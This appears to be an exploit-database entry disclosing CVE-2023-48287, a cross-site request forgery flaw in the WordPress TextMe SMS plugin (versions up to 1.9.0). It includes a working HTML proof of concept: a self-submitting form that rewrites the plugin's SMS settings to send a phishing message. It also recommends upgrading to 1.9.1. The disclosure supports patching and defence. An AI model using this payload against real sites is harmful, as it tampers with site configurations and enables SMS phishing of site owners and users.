Lucene search

K
zdtArvandy1337DAY-ID-39191
HistoryDec 12, 2023 - 12:00 a.m.

WordPress TextMe SMS 1.9.0 Cross Site Request Forgery Vulnerability

2023-12-1200:00:00
Arvandy
0day.today
131
wordpress
textme sms
csrf
vulnerability
account details
contact form 7 events
sensitive data leakage
phishing attacks
upgrade

7.1 High

AI Score

Confidence

Low

0 Low

EPSS

Percentile

0.0%

# Exploit Title: WP Plugins TextMe SMS <= 1.9.0 - CSRF
# Exploit Author: Arvandy
# Software Link: https://wordpress.org/plugins/textme-sms-integration/
# Version: 1.9.0
# Tested on: Windows, Linux
# CVE: CVE-2023-48287

# Product Description
This plugin allows you to send SMS messages from your WordPress dashboard to the site owner or to your end users.

# Vulnerability overview
The Wordpress plugins TextMe SMS <= 1.9.0 is vulnerable to Cross-Site Request Forgery in the Settings function (Account details and Contact Form 7 Events). This could allow unauthenticated users to trick authenticated users to unintentionally modify the account details and contact form 7 events. This could lead to sensitive data leakage as well as phishing attacks. 

# Proof of Concept
<html>
  <body>
    <form action="http://x.x.x.x/WP/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="tetxme_update_option_page" />
      <input type="hidden" name="data" value="textme_cf7=1&textme_cf7_user=1&textme_cf7_phone_field=0123456789&textme_cf7_user_content=SMS%20Phishing%20Sample" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>


# Recommendation
Upgrade to version 1.9.1

7.1 High

AI Score

Confidence

Low

0 Low

EPSS

Percentile

0.0%

Related for 1337DAY-ID-39191